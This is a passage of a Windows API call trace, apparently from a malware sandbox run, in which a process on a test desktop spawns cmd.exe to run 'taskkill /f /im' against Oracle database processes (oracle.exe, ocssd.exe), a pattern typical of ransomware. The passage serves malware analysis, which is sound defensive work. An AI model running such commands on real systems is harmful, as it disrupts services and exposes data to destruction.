dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0153.246] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x123f0ff8 | out: lpFileInformation=0x123f0ff8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.246] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0153.246] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x123f1048 | out: lpFileInformation=0x123f1048*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.246] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0153.246] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x123f1098 | out: lpFileInformation=0x123f1098*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0153.246] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0153.246] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123e8820, nSize=0x64 | out: lpBuffer="") returned 0x63 [0153.246] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f10e8 | out: lpFileInformation=0x123f10e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0153.246] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e88f0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0153.246] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f1138 | out: lpFileInformation=0x123f1138*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0153.246] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0153.247] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0153.247] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0153.247] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0153.247] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0153.247] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0153.247] GetEnvironmentStringsW () returned 0x8ea900* [0153.247] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0153.247] GetCurrentProcess () returned 0xffffffff [0153.247] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234f0d0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234f0d0*=0x158) returned 1 [0153.247] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234f0d4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234f0d4*=0x130) returned 1 [0153.248] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234f0d8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234f0d8*=0x13c) returned 1 [0153.248] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im oracle.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12428000, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x158, hStdOutput=0x130, hStdError=0x13c), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im oracle.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x144, hThread=0x140, dwProcessId=0x4b4, dwThreadId=0x12f4)) returned 1 [0153.334] CloseHandle (hObject=0x140) returned 1 [0153.334] CloseHandle (hObject=0x13c) returned 1 [0153.334] CloseHandle (hObject=0x130) returned 1 [0153.334] CloseHandle (hObject=0x158) returned 1 [0153.334] CloseHandle (hObject=0x154) returned 1 [0153.334] CloseHandle (hObject=0x134) returned 1 [0153.334] CloseHandle (hObject=0x138) returned 1 [0153.334] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0154.794] SetEvent (hEvent=0x150) returned 1 [0154.794] GetExitCodeProcess (in: hProcess=0x144, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0154.794] GetProcessTimes (in: hProcess=0x144, lpCreationTime=0x12422240, lpExitTime=0x12422248, lpKernelTime=0x12422250, lpUserTime=0x12422258 | out: lpCreationTime=0x12422240, lpExitTime=0x12422248, lpKernelTime=0x12422250, lpUserTime=0x12422258) returned 1 [0154.795] CloseHandle (hObject=0x144) returned 1 [0154.795] SetEvent (hEvent=0x128) returned 1 [0154.795] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0154.808] SetEvent (hEvent=0x128) returned 1 [0154.808] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e89c0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0154.808] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f1188 | out: lpFileInformation=0x123f1188*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.809] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0154.809] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x123f11d8 | out: lpFileInformation=0x123f11d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.809] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0154.809] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f1228 | out: lpFileInformation=0x123f1228*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.809] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0154.809] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x123f1278 | out: lpFileInformation=0x123f1278*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.809] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0154.809] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x123f12c8 | out: lpFileInformation=0x123f12c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.809] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0154.810] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x123f1318 | out: lpFileInformation=0x123f1318*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.810] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0154.810] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x123f1368 | out: lpFileInformation=0x123f1368*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.810] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0154.810] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x123f13b8 | out: lpFileInformation=0x123f13b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.810] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0154.810] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x123f1408 | out: lpFileInformation=0x123f1408*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.810] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0154.811] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x123f1458 | out: lpFileInformation=0x123f1458*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.811] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0154.811] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x123f14a8 | out: lpFileInformation=0x123f14a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.811] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0154.811] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x123f14f8 | out: lpFileInformation=0x123f14f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0154.811] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0154.820] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123e8a90, nSize=0x64 | out: lpBuffer="") returned 0x63 [0154.820] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f1548 | out: lpFileInformation=0x123f1548*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0154.820] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e8b60, nSize=0x64 | out: lpBuffer="") returned 0x35 [0154.820] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f1598 | out: lpFileInformation=0x123f1598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0154.820] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x144 [0154.820] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0154.821] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0154.821] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0154.821] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0154.821] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0154.821] GetEnvironmentStringsW () returned 0x8ea900* [0154.821] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0154.822] GetCurrentProcess () returned 0xffffffff [0154.822] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x144, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234f4f0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234f4f0*=0x154) returned 1 [0154.822] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234f4f4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234f4f4*=0x158) returned 1 [0154.822] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234f4f8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234f4f8*=0x130) returned 1 [0154.822] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im ocssd.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12428a80, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x154, hStdOutput=0x158, hStdError=0x130), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im ocssd.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x140, hThread=0x13c, dwProcessId=0x1304, dwThreadId=0x338)) returned 1 [0154.932] SetEvent (hEvent=0x150) returned 1 [0154.932] CloseHandle (hObject=0x13c) returned 1 [0154.932] CloseHandle (hObject=0x130) returned 1 [0154.932] CloseHandle (hObject=0x158) returned 1 [0154.932] CloseHandle (hObject=0x154) returned 1 [0154.932] CloseHandle (hObject=0x144) returned 1 [0154.932] CloseHandle (hObject=0x138) returned 1 [0154.932] CloseHandle (hObject=0x134) returned 1 [0154.933] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0xffffffff) returned 0x0 [0157.585] SetEvent (hEvent=0x150) returned 1 [0157.586] GetExitCodeProcess (in: hProcess=0x140, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0157.586] GetProcessTimes (in: hProcess=0x140, lpCreationTime=0x1242a1e0, lpExitTime=0x1242a1e8, lpKernelTime=0x1242a1f0, lpUserTime=0x1242a1f8 | out: lpCreationTime=0x1242a1e0, lpExitTime=0x1242a1e8, lpKernelTime=0x1242a1f0, lpUserTime=0x1242a1f8) returned 1 [0157.586] CloseHandle (hObject=0x140) returned 1 [0157.586] SetEvent (hEvent=0x128) returned 1 [0157.586] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0157.611] SetEvent (hEvent=0x150) returned 1 [0157.611] SetEvent (hEvent=0x128) returned 1 [0157.611] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123bac30, nSize=0x64 | out: lpBuffer="") returned 0x35 [0157.611] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b1638 | out: lpFileInformation=0x123b1638*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0157.612] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0157.612] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x123b1688 | out: lpFileInformation=0x123b1688*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0157.612] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0157.612] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b16d8 | out: lpFileInformation=0x123b16d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0157.612] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0157.612] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x123b1728 | out: lpFileInformation=0x123b1728*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, 